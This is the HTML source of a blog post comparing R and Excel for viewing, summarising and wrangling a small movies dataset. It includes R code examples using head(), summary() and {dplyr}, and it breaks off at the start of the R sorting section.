&lt;img src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/the_data.png" alt="Screenshot of the data in an Excel spreadsheet." style="width: 400px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h4 id="r-1"&gt;R&lt;/h4&gt;
&lt;p&gt;To view our data in R, we could simply click on it in the environment or
we could call the name of the data set in the script. If we are working
with a large data set, we can also view a subset of this data by using
functions like &lt;code&gt;head()&lt;/code&gt; and &lt;code&gt;tail()&lt;/code&gt;. We could also use the &lt;code&gt;colnames()&lt;/code&gt;
function to programmatically display the variable names within our data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit Number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2012 150 2 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2013 300 4 4000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 2013 130 2 4020&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 22 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str&lt;/span&gt;(movies_data) &lt;span style="color:#8b949e;font-style:italic"&gt;# Displays the structure of the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## spc_tbl_ [26 × 5] (S3: spec_tbl_df/tbl_df/tbl/data.frame)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ Country : chr [1:26] &amp;#34;England&amp;#34; &amp;#34;America&amp;#34; &amp;#34;America&amp;#34; &amp;#34;England&amp;#34; ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ Year : num [1:26] 2011 2012 2013 2013 2013 ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ Highest_profit: num [1:26] 100 150 300 130 177 350 700 650 230 440 ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ Number_movies : num [1:26] 3 2 4 2 3 1 6 2 1 3 ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## $ no_employees : num [1:26] 1500 2000 4000 4020 5300 3150 6000 5000 1420 5000 ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## - attr(*, &amp;#34;spec&amp;#34;)=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. cols(&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. Country = col_character(),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. Year = col_double(),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. Highest_profit = col_double(),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. Number_movies = col_double(),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. no_employees = col_double()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## .. )&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## - attr(*, &amp;#34;problems&amp;#34;)=&amp;lt;externalptr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(movies_data) &lt;span style="color:#8b949e;font-style:italic"&gt;# Displays the first six rows of the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit Number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2011 100 3 1500&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2012 150 2 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2013 300 4 4000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 England 2013 130 2 4020&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 2 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tail&lt;/span&gt;(movies_data) &lt;span style="color:#8b949e;font-style:italic"&gt;# Displays the last six rows of data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit Number_movies no_employees&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 England 2021 120 1 1325&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 America 2021 800 3 6800&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 America 2022 400 2 7200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 China 2021 230 2 3101&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ℹ 2 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;colnames&lt;/span&gt;(movies_data) &lt;span style="color:#8b949e;font-style:italic"&gt;# Displays all the variable names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Country&amp;#34; &amp;#34;Year&amp;#34; &amp;#34;Highest_profit&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [4] &amp;#34;Number_movies&amp;#34; &amp;#34;no_employees&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;movies&lt;/code&gt; data is comprised of five columns: country, year, highest
profit gained per movie, number of movies produced and number of
employees on set during production. R displays our data
programmatically, whereas Excel requires a lot of
eye-balling and manual scrolling. If we were interested in displaying a
subset of our data, in a report for example, using R we could simply use
the functions above. To do this in Excel we would have to copy
the first 6 rows of the data and manually paste them into the report document.&lt;/p&gt;
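&lt;p&gt;As a minimal sketch of the report use case, the example below builds a small stand-in data frame (the &lt;code&gt;films&lt;/code&gt; object and its values are hypothetical, not the &lt;code&gt;movies&lt;/code&gt; data) and uses the &lt;code&gt;n&lt;/code&gt; argument of &lt;code&gt;head()&lt;/code&gt; and &lt;code&gt;tail()&lt;/code&gt; to control how many rows are returned.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Hypothetical stand-in data, used only for illustration
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;films = data.frame(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  country = c(&amp;#34;England&amp;#34;, &amp;#34;America&amp;#34;, &amp;#34;America&amp;#34;, &amp;#34;England&amp;#34;, &amp;#34;China&amp;#34;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  year = c(2011, 2012, 2013, 2013, 2014)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# First three rows, e.g. for a table in a report
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;first_rows = head(films, n = 3)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Last two rows
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;last_rows = tail(films, n = 2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Number of rows and columns
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dim(films)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Because the number of rows is an argument rather than a manual selection, the same lines keep working if the data grows.&lt;/p&gt;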
&lt;h3 id="summary-statistics"&gt;Summary Statistics&lt;/h3&gt;
&lt;p&gt;Now, let’s apply some summary statistics on our data. Summary statistics
provide a quick summary of data and are particularly useful for
comparing one project to another, or before and after.&lt;/p&gt;
&lt;h4 id="excel-2"&gt;Excel&lt;/h4&gt;
&lt;p&gt;It is well known that Excel limits how much data a single
worksheet can hold: current versions allow at most 1,048,576 rows and
16,384 columns per sheet, while R is made to handle larger data sets.
Excel files with many tabs of data are also known to become unstable
or crash. Excel is able to handle a good chunk of data, but this
becomes very risky when you
unknowingly start to lose data because the file has become too big and
is unable to save. To generate summary statistics (such as the minimum
and maximum values) of our data in Excel, we followed a few steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Go to the Home tab&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In the Editing group, click the arrow next to &lt;em&gt;AutoSum&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Click Min&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Click Max&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Press Enter&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These steps were quite easy to follow; however, I often forget where to
click or which tab to select. After discussing this workflow with a
colleague, we also discovered slight differences in the steps for
different versions of Excel. This did not seem very effective or
reproducible to us.&lt;/p&gt;
&lt;h4 id="r-2"&gt;R&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;summary&lt;/span&gt;(movies_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Country Year Highest_profit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Length:26 Min. :2011 Min. : 11 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Class :character 1st Qu.:2013 1st Qu.:157 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Mode :character Median :2017 Median :320 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Mean :2017 Mean :350 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3rd Qu.:2021 3rd Qu.:485 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Max. :2022 Max. :800 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Number_movies no_employees &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Min. :1.00 Min. :1325 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1st Qu.:2.00 1st Qu.:2275 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Median :2.50 Median :4401 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Mean :2.65 Mean :4338 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3rd Qu.:3.00 3rd Qu.:6375 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Max. :6.00 Max. :7200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Standard deviation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sd&lt;/span&gt;(movies_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Highest_profit)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 224&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Lowest value of the Highest profit column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;min&lt;/span&gt;(movies_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Highest_profit)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Highest value of the Highest profit column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(movies_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Highest_profit)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 800&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The dollar symbol, &lt;code&gt;$&lt;/code&gt;, used here extracts a single column from a data
set, so &lt;code&gt;movies_data$Highest_profit&lt;/code&gt; is the &lt;code&gt;Highest_profit&lt;/code&gt; column of
&lt;code&gt;movies_data&lt;/code&gt;. R code can be reused repeatedly and with different data sets in ways that
Excel formulas cannot. R clearly shows the code (instructions), data and
columns used for an analysis in ways that Excel does not. If I were to
share this script with a colleague they would have a complete
understanding of how the summary statistics were generated because of
R’s human-readable syntax.&lt;/p&gt;
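&lt;p&gt;To illustrate the point about reuse, here is a minimal sketch in which the same few lines are applied to two different data sets. The &lt;code&gt;column_summary()&lt;/code&gt; helper and both data frames are hypothetical and exist only for this example.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Hypothetical helper: summarise one numeric column of any data frame
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;column_summary = function(data, column) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  values = data[[column]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  c(min = min(values), max = max(values), sd = sd(values))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Two small made-up data sets, for illustration only
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;films_a = data.frame(profit = c(100, 150, 300))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;films_b = data.frame(profit = c(20, 40))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# The same call works on either data set
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;column_summary(films_a, &amp;#34;profit&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;column_summary(films_b, &amp;#34;profit&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here &lt;code&gt;data[[column]]&lt;/code&gt; does the same job as &lt;code&gt;$&lt;/code&gt;, but accepts the column name as a character string so that it can be passed in as an argument.&lt;/p&gt;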
&lt;h3 id="data-wrangling"&gt;Data Wrangling&lt;/h3&gt;
&lt;p&gt;Data manipulation tools assist us with modifying our data to make it
easier to read and organise. For example, one of the easiest data
manipulation tools in Excel is inserting columns and rows. The purpose
of data manipulation is to create a consistent, organised and clean data
set. With this in mind, let’s apply the following data manipulations in
Excel and then R:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Rename the columns into a consistent format&lt;/li&gt;
&lt;li&gt;Arrange the year column in ascending order&lt;/li&gt;
&lt;li&gt;Select columns and create a new column&lt;/li&gt;
&lt;li&gt;Remove a column from the data&lt;/li&gt;
&lt;li&gt;Select only the entries for the year 2021&lt;/li&gt;
&lt;li&gt;Remove only the entries from rows 4-11&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id="1-renaming-columns-in-r-and-excel"&gt;1. Renaming columns in R and Excel&lt;/h4&gt;
&lt;h4 id="excel-3"&gt;Excel&lt;/h4&gt;
&lt;p&gt;Renaming columns in Excel is a completely manual process, which makes it
extremely time-consuming and risky, especially if you are working
across multiple messy Excel sheets.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif displaying the manual process of renaming columns in Excel." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/renaming_excel.gif" width="600"&gt;&lt;/p&gt;
&lt;h4 id="r-3"&gt;R&lt;/h4&gt;
&lt;p&gt;For data manipulation in R, we use a powerful package called
{dplyr}. Let’s install and load the package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Installing the packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To rename the columns, {dplyr} provides &lt;code&gt;rename()&lt;/code&gt; for renaming columns one at a time and
&lt;code&gt;rename_with()&lt;/code&gt; for applying a function to every column name. Here we pass
&lt;code&gt;rename_with()&lt;/code&gt; our data set (&lt;code&gt;movies_data&lt;/code&gt;) and the base R function
&lt;code&gt;tolower()&lt;/code&gt;, which converts every column name to lower case. Other packages
offer further ways to clean column names,
but for the purposes of this blog, we will stick with {dplyr}.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Renaming the columns into a consistent (lower case) format&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;movies_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename_with&lt;/span&gt;(movies_data, tolower)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="2-arrange-the-year-column-in-ascending-order"&gt;2. Arrange the year column in ascending order&lt;/h4&gt;
&lt;h4 id="excel-4"&gt;Excel&lt;/h4&gt;
&lt;p&gt;To sort the column in ascending order, we had to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Select the &lt;code&gt;year&lt;/code&gt; column&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Go to the &lt;code&gt;Sort and Filter&lt;/code&gt; tab&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Select the option to sort from the smallest to the largest value&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/graphics/sort_data.png" alt="A screenshot of the Excel Tab used to sort the data accordingly" style="width: 400px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;h4 id="r-4"&gt;R&lt;/h4&gt;
